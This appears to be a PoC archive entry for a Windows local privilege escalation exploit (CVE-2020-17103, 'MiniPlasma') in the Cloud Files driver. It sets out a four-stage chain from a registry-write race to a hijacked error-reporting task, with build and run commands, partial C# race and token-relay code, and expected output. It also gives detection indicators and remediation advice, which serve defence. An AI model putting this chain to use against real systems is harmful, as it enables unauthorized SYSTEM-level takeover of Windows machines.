PoC Archive PoC Archive
High CVE-2020-17103 unpatched

MiniPlasma - Windows Cloud Files Mini Filter Driver LPE (CVE-2020-17103)

by Nightmare-Eclipse, Elliot · 2026-05-15

CVSS 7.8/10
Severity
High
CVE
CVE-2020-17103
Category
binary
Affected product
Windows Cloud Files Mini Filter Driver (cldflt.sys) / cldapi.dll
Affected versions
All Windows versions (patch reportedly absent or silently reverted)
Disclosed
2026-05-15
Patch status
unpatched

Metadata

FieldValue
Date Added2026-05-15
Last Updated2026-05-16
Author / ResearcherNightmare-Eclipse, Elliot
CVE / AdvisoryCVE-2020-17103
Categorybinary
SeverityHigh
CVSS Score7.8 (CVSSv3)
StatusWeaponized
TagsLPE, Windows, cldflt.sys, Cloud Files API, registry-symlink, race-condition, WER-hijack, SYSTEM-shell, local-user
RelatedN/A

Affected Target

FieldValue
Software / SystemWindows Cloud Files Mini Filter Driver (cldflt.sys) / cldapi.dll
Versions AffectedAll Windows versions (patch reportedly absent or silently reverted)
Language / PlatformC# / .NET / Windows
Authentication RequiredYes (local code execution as non-admin user)
Network Access RequiredLocal only

Summary

MiniPlasma is a fully weaponized Windows LPE that exploits a race condition in cldflrt!HsmOsBlockPlaceholderAccess inside cldflt.sys — the same vulnerability originally discovered by James Forshaw (Google Project Zero) and reported as CVE-2020-17103 in 2020. The author found the exact same vulnerable routine is still present and exploitable, either never patched or with the patch silently rolled back.

The exploit chains four stages to deliver a SYSTEM shell in the current user session: race CfAbortOperation to gain an arbitrary registry write primitive → plant a registry symlink redirecting CloudFiles\BlockedApps → overwrite windir in Volatile Environment → hijack the Windows Error Reporting scheduled task (QueueReporting) to execute as SYSTEM via a fake wermgr.exe and named-pipe token relay.


Vulnerability Details

Root Cause

cldflrt!HsmOsBlockPlaceholderAccess in the Cloud Files Mini Filter Driver contains a race condition exploitable via CfAbortOperation with the Block flag. By racing thread impersonation token swaps (switching between anonymous and normal tokens), an unprivileged caller can force the driver to perform a privileged registry write on behalf of the caller — granting an arbitrary-registry-key-write primitive from a low-privilege user process.

Attack Chain (4 Stages)

StageRoleTechnique
0 — OrchestratorSpawns and sequences Stages 1–3Child process management
1 — Race triggerWins the CfAbortOperation race to obtain privileged registry writeToken race: anonymous ↔ normal on background thread; watches for registry key sentinel
2 — Symlink plantUses the write primitive to delete BlockedApps contents and plant a registry symlink: BlockedAppsVolatile EnvironmentRegistry symbolic link attack
3 — SYSTEM shell deliveryOverwrites windir in Volatile Environment → drops fake System32\wermgr.exe → triggers QueueReporting task (SYSTEM context) → named-pipe token relay → conhost.exe spawned as SYSTEM in user sessionScheduled task abuse + token duplication via named pipe (MiniPlasmaWERPipe)

Impact

Full local privilege escalation to SYSTEM. The exploit reliably spawns an interactive SYSTEM shell in the attacker’s session.


Environment / Lab Setup

OS:       Windows (all versions — patch reportedly absent or reverted)
Target:   Host with Cloud Files components (cldapi.dll / cldflt.sys) present
Attacker: Local non-admin user with execution rights
Tools:    Visual Studio 2019/2022, .NET, NuGet (NtApiDotNet 1.1.33, TaskScheduler 2.12.2)

Setup Steps


Proof of Concept

Step-by-Step Reproduction

  1. Build — restore NuGet dependencies and compile the solution.

    msbuild PoC_AbortHydration_ArbitraryRegKey_EoP.sln /p:Configuration=Release
    
  2. Execute — run as a non-admin local user.

    PoC_AbortHydration_ArbitraryRegKey_EoP.exe
    
  3. Stage progression — the orchestrator sequences Stages 1–3 automatically. On success a SYSTEM shell opens in the user’s session.

Exploit Code

See Program.cs in this folder for the full 4-stage implementation.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
// Stage 1 — race CfAbortOperation with thread token swap
Thread raceThread = new Thread(() => {
    while (!raceWon) {
        NtThread.Current.ImpersonateAnonymousToken();
        CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block);
        NtThread.Current.RevertToSelf();
    }
});

// Stage 3 — SYSTEM shell delivery via named pipe token relay
using (var server = new NamedPipeServerStream("MiniPlasmaWERPipe", ...)) {
    server.WaitForConnection();
    // duplicate SYSTEM token, adjust session, spawn conhost.exe as SYSTEM
}

Expected Output

[*] Stage 1: racing CfAbortOperation...
[+] Race won — arbitrary registry write obtained
[*] Stage 2: planting registry symlink BlockedApps -> Volatile Environment
[+] Symlink planted
[*] Stage 3: overwriting windir, triggering QueueReporting task...
[+] SYSTEM process connected on MiniPlasmaWERPipe
[+] Spawning SYSTEM shell — enjoy

Screenshots / Evidence

  • screenshots/ — add authorized lab evidence here

Detection & Indicators of Compromise

SIEM correlation:

low-priv process
  -> repeated cldapi abort calls + token swap
  -> registry ACL change on CloudFiles\BlockedApps
  -> symlink creation (BlockedApps -> Volatile Environment)
  -> windir overwrite in HKU\.DEFAULT\Volatile Environment
  -> wermgr.exe execution from non-system path as SYSTEM

Remediation

ActionDetail
PatchMonitor Microsoft advisories for a re-issue of the CVE-2020-17103 fix targeting cldflt.sys
WorkaroundDisable Windows Cloud Files / OneDrive sync if not required; restrict scheduled task execution (QueueReporting) via AppLocker or WDAC
Config HardeningEnforce application allowlisting, registry auditing on HKU\.DEFAULT\Software\Policies\Microsoft\CloudFiles, and monitor windir value changes in Volatile Environment

References


Notes

Auto-ingested from https://github.com/Nightmare-Eclipse/MiniPlasma on 2026-05-15. Updated 2026-05-16: researcher overhauled the PoC from a registry-key manipulation demo to a full 4-stage SYSTEM shell exploit. The src/ directory was replaced with the finalized PoC_AbortHydration_ArbitraryRegKey_EoP Visual Studio project. Root cause precisely identified as cldflrt!HsmOsBlockPlaceholderAccess race condition — identical to the 2020 Project Zero finding, reportedly still unpatched. Second contributor: Elliot (uploaded final PoC files). Repository reached 330 stars and 79 forks within 3 days.